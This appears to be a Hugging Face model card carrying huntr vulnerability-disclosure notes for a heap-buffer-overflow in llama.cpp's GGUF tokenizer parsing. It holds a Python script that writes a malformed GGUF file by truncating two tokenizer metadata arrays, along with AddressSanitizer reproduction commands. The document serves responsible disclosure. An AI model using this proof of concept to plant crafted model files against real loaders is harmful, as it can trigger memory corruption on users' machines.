kwikyy's picture
Add model card metadata header
d6f1a63 verified
metadata
license: other
language:
  - en
tags:
  - security
  - gguf
  - poc
  - llama-cpp
  - huntr
library_name: llama-cpp

Huntr submission notes

This folder contains a status summary and repro steps for a GGUF heap-buffer-overflow in tokenizer metadata parsing.

Files

  • huntr_submission/STATUS.md

PoC model file

  • tmp/gguf_fuzz/llama-spm-bad-scores.gguf

Base model file

  • models/ggml-vocab-llama-spm.gguf

PoC generation

  • The PoC is created by truncating the tokenizer.ggml.scores and tokenizer.ggml.token_type metadata arrays by one element each, so their lengths no longer match the tokenizer's token list.
  • Script used:
import struct
from pathlib import Path

# Base (valid) vocab model in, truncated PoC model out.
in_path = Path('models/ggml-vocab-llama-spm.gguf')
out_path = Path('tmp/gguf_fuzz/llama-spm-bad-scores.gguf')

# Byte width of each GGUF metadata value type, keyed by the type id from the
# GGUF spec (0=u8, 1=i8, 2=u16, 3=i16, 4=u32, 5=i32, 6=f32, 7=bool,
# 10=u64, 11=i64, 12=f64 — presumed from the spec; verify against gguf docs).
# Types 8 (string) and 9 (array) are variable-length, hence None.
GGUF_TYPE_SIZES = {
    0: 1, 1: 1, 2: 2, 3: 2, 4: 4, 5: 4, 6: 4, 7: 1, 8: None, 9: None, 10: 8, 11: 8, 12: 8,
}
# struct format string (little-endian) for each fixed-size scalar type above;
# no entries for the variable-length types 8 and 9.
GGUF_TYPE_FORMAT = {
    0: '<B', 1: '<b', 2: '<H', 3: '<h', 4: '<I', 5: '<i', 6: '<f', 7: '<b', 10: '<Q', 11: '<q', 12: '<d',
}

def read_exact(f, n):
    """Read exactly *n* bytes from file object *f*.

    Raises EOFError if the stream ends before *n* bytes are available,
    so truncated inputs fail loudly instead of silently mis-parsing.
    """
    data = f.read(n)
    if len(data) == n:
        return data
    raise EOFError('unexpected EOF')

def read_u32(f):
    """Read a little-endian unsigned 32-bit integer."""
    (value,) = struct.unpack('<I', read_exact(f, 4))
    return value


def read_i32(f):
    """Read a little-endian signed 32-bit integer."""
    (value,) = struct.unpack('<i', read_exact(f, 4))
    return value


def read_u64(f):
    """Read a little-endian unsigned 64-bit integer."""
    (value,) = struct.unpack('<Q', read_exact(f, 8))
    return value


def read_i64(f):
    """Read a little-endian signed 64-bit integer."""
    (value,) = struct.unpack('<q', read_exact(f, 8))
    return value

def read_string(f):
    """Read a GGUF string: a u64 byte count followed by that many raw bytes.

    Returns the payload as bytes (no decoding is attempted).
    """
    length = read_u64(f)
    return read_exact(f, length)

def parse_file(path):
    """Parse the header and key-value metadata section of a GGUF file.

    Returns (magic, version, n_tensors, kv_list) where kv_list is a list of
    (key, vtype, arr_type, value) tuples; arr_type is None for non-array
    values. Tensor info/data past the KV section is not read.
    """
    with open(path, 'rb') as f:
        magic = read_exact(f, 4)
        version = read_u32(f)
        n_tensors = read_i64(f)
        n_kv = read_i64(f)

        entries = []
        for _ in range(n_kv):
            key = read_string(f)
            vtype = read_i32(f)
            if vtype == 8:
                # Scalar string value.
                entries.append((key, vtype, None, read_string(f)))
            elif vtype == 9:
                # Array: element type id + element count, then packed payload.
                arr_type = read_i32(f)
                arr_len = read_u64(f)
                if arr_type == 8:
                    values = [read_string(f) for _ in range(arr_len)]
                else:
                    elem_size = GGUF_TYPE_SIZES[arr_type]
                    raw = read_exact(f, elem_size * arr_len)
                    # Repeat the single-element format code arr_len times to
                    # unpack the whole array in one struct call.
                    code = GGUF_TYPE_FORMAT[arr_type][1]
                    values = list(struct.unpack('<' + code * arr_len, raw))
                entries.append((key, vtype, arr_type, values))
            else:
                # Fixed-size scalar.
                size = GGUF_TYPE_SIZES[vtype]
                value = struct.unpack(GGUF_TYPE_FORMAT[vtype], read_exact(f, size))[0]
                entries.append((key, vtype, None, value))
        return magic, version, n_tensors, entries

def write_file(path, magic, version, n_tensors, kv_list):
    """Serialize a GGUF header plus KV metadata list back to *path*.

    The inverse of parse_file for the portion it reads: only the header and
    KV section are written (no tensor info/data follows them).
    """
    with open(path, 'wb') as f:
        f.write(magic)
        f.write(struct.pack('<I', version))
        f.write(struct.pack('<q', n_tensors))
        f.write(struct.pack('<q', len(kv_list)))

        for key, vtype, arr_type, val in kv_list:
            # Keys are length-prefixed byte strings.
            f.write(struct.pack('<Q', len(key)) + key)
            f.write(struct.pack('<i', vtype))
            if vtype == 8:
                # Scalar string.
                f.write(struct.pack('<Q', len(val)) + val)
            elif vtype == 9:
                # Array: element type, count, then the packed elements.
                f.write(struct.pack('<i', arr_type))
                f.write(struct.pack('<Q', len(val)))
                if arr_type == 8:
                    for item in val:
                        f.write(struct.pack('<Q', len(item)) + item)
                else:
                    code = GGUF_TYPE_FORMAT[arr_type][1]
                    f.write(struct.pack('<' + code * len(val), *val))
            else:
                # Fixed-size scalar.
                f.write(struct.pack(GGUF_TYPE_FORMAT[vtype], val))

# Load the valid base model's metadata, truncate the two per-token arrays by
# one element each (creating the length mismatch the loader mishandles), and
# write the result out as the PoC file.
magic, version, n_tensors, kv_list = parse_file(in_path)

new_kv = []
for key, vtype, arr_type, val in kv_list:
    if vtype == 9 and key in (b'tokenizer.ggml.scores', b'tokenizer.ggml.token_type'):
        val = val[:-1]
    new_kv.append((key, vtype, arr_type, val))

write_file(out_path, magic, version, n_tensors, new_kv)
print('wrote', out_path)

Repro (ASan)

cmake -B build-asan -DLLAMA_SANITIZE_ADDRESS=ON -DLLAMA_SANITIZE_UNDEFINED=ON -DGGML_SANITIZE_ADDRESS=ON -DGGML_SANITIZE_UNDEFINED=ON -DGGML_CCACHE=OFF -DLLAMA_BUILD_TESTS=ON -DLLAMA_BUILD_EXAMPLES=ON -DLLAMA_BUILD_TOOLS=ON -DLLAMA_BUILD_SERVER=OFF -DCMAKE_BUILD_TYPE=RelWithDebInfo
cmake --build build-asan --target llama-tokenize -j $(getconf _NPROCESSORS_ONLN)
./build-asan/bin/llama-tokenize -m tmp/gguf_fuzz/llama-spm-bad-scores.gguf -p "hello"